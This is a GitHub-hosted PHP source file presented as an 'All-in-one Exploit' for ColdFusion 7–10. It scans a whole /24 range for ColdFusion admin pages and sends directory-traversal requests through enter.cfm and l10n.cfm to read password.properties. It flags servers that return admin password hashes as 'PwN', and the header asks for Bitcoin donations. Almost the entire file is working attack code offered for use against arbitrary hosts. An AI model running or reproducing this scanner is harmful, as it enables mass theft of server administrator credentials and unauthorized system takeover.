-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathcfide.php
More file actions
179 lines (163 loc) · 13.3 KB
/
Copy pathcfide.php
File metadata and controls
179 lines (163 loc) · 13.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
<?php
/*
#####################################################################
# Name : ColdFusion 7>10 All-in-one Exploit #
# Description : CF7>10 Local File Disclosure [password.properties] #
# Risk Level : High-level [Root/SystemAdmin access] #
# Coded By : Mr.aFiR [03-2014] #
# Resources : http://www.blackhatlibrary.net/Coldfusion_hacking #
# http://www.exploit-db.com/exploits/30210/ #
# http://www.exploit-db.com/exploits/25305/ #
#####################################################################
BTC Donations are accepted on: 1Cm2naxWqDznUQvXiNEFxrU8hRQFmBwUfJ
Note: Using this tool against any system without authorization is a criminal act.
*/
error_reporting(0);
$VULNz = 0;
$Ninez = 0;
?>
<html><title>CFM 2</title>
<style>
body {
background-color:#000000;
color:#FFFFFF;
font-family:Arial;
margin-bottom:30px;
margin-top:80px;
}
a {
color:yellow;
text-decoration:none;
}
input {
background-color:#000000;
color:#FFFFFF;
border:1px solid #333333;
}
#xline {
position:fixed;
top:0px;
left:0px;
right:0px;
background-color:#000000;
padding:10px;
}
</style>
<div id="xline">
<form action="" method="post">
<input type="text" name="target"> => <? if($_POST['target']){ print $_POST['target']; } ?>
</form>
</div>
<pre>
<?
$range = $_POST['target'];
if(!$range){ print "<span style='color:yellow;'>\n ===== A host is required =====\n > php x.php [host] \n\n"; exit; }
$range = gethostbyname($range);
$range = explode(".",$range);
$nange = $range[0].".".$range[1].".".$range[2];
$range = $range[0].".".$range[1].".".$range[2].".0-255";
if(strstr(file_get_contents("vip"),$nange)){ die("Already scanned this range!"); }
$fh = fopen("vip","a"); fwrite($fh,$nange."\n"); fclose($fh);
$range = explode('.', $range );
foreach( $range as $index=>$octet )
$range[$index] = array_map( 'intval', explode('-',$octet) );
for( $octet1=$range[0][0]; $octet1<=(($range[0][1])? $range[0][1]:$range[0][0]); $octet1++ )
for( $octet2=$range[1][0]; $octet2<=(($range[1][1])? $range[1][1]:$range[1][0]); $octet2++ )
for( $octet3=$range[2][0]; $octet3<=(($range[2][1])? $range[2][1]:$range[2][0]); $octet3++ )
for( $octet4=$range[3][0]; $octet4<=(($range[3][1])? $range[3][1]:$range[3][0]); $octet4++ )
{
$ip = $octet1.".".$octet2.".".$octet3.".".$octet4;
$x = curl_init();
curl_setopt($x, CURLOPT_URL, "http://".$ip."/CFIDE/administrator/enter.cfm");
curl_setopt($x,CURLOPT_CONNECTTIMEOUT,1);
ob_start();
curl_exec( $x );
$buffer = ob_get_contents();
ob_end_clean();
$title_start = strpos( $buffer, '<title>')+strlen('<title>');
$title_end = strpos( $buffer, '</title>');
print "[".$VULNz."] ".$ip." : ";
flush(); ob_flush();
if( $title_end!==false ){
$ttl = trim(substr( $buffer, $title_start, $title_end-$title_start ));
if(strstr($ttl, "Cold")){
print "<span style='color:green;'>".$ttl."</span>\n";
flush(); ob_flush();
if(checkifNine($ip)){
$Ninez = $Ninez + 1;
print " <span style='color:yellow;'>======================= ColdFusion 9 =======================</span>\n";
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF9 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF9 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
}else{
print " => CF6 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\CFusionMX\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CF7 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\CFusionMX7\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CF8 WIN Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\ColdFusion8\lib\password.")."properties%00en"); flush(); ob_flush();
print " => WIN Old Checking ... "; checkExploit($ip, "CFIDE/administrator/enter.cfm?locale=".urlencode("..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.")."properties%00en"); flush(); ob_flush();
print " => CFX LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../lib/password.properties")); flush(); ob_flush();
print " => CFX WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties")); flush(); ob_flush();
print " => CF10 WIN Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties")); flush(); ob_flush();
print " => CF10 LNX Checking ... "; checkExploit($ip, "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=".urlencode("../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties")); flush(); ob_flush();
}
}else{
print "<span style='color:gray;'>".$ttl."</span>\n";
flush(); ob_flush();
}
}elseif( strlen($buffer)>0 ){
print "<span style='color:red;'>Cannot get title</span>\n";
flush(); ob_flush();
}else{
print "<span style='color:red;'>[Not a site]</span>\n";
flush(); ob_flush();
}
}
print "\n<span style='color:yellow;'> ===== Scan finished with ".$VULNz." vulnerable host(s) | $Ninez</span>\n";
function checkExploit($ip, $url){
global $colors; global $VULNz;
$lnk = "http://".$ip."/".$url;
$xp = curl_init();
curl_setopt($xp, CURLOPT_URL, $lnk);
curl_setopt($xp,CURLOPT_CONNECTTIMEOUT,1);
ob_start();
curl_exec( $xp );
$buff = ob_get_contents();
ob_end_clean();
if(strstr($buff,"password=")){
print "<span style='color:green;'>VULN: <a href='".$lnk."'>{PwN}</a></span>";
flush(); ob_flush();
$VULNz = $VULNz+1;
}else{
print "<span style='color:red;'>PATCHED</span>";
flush(); ob_flush();
}
print "\n";
}
function checkifNine($ip){
global $colors; global $VULNz;
$url = "CFIDE/administrator/images/loginbackground.jpg";
$lnk = "http://".$ip."/".$url;
$img = file_get_contents($lnk);
$imghash = "596b3fc4f1a0b818979db1cf94a82220";
if(md5($img)==$imghash){
return true;
}else{
return false;
}
}
?>
<script type="text/javascript"> window.scrollTo(0,document.body.scrollHeight); </script>
</pre>
</html>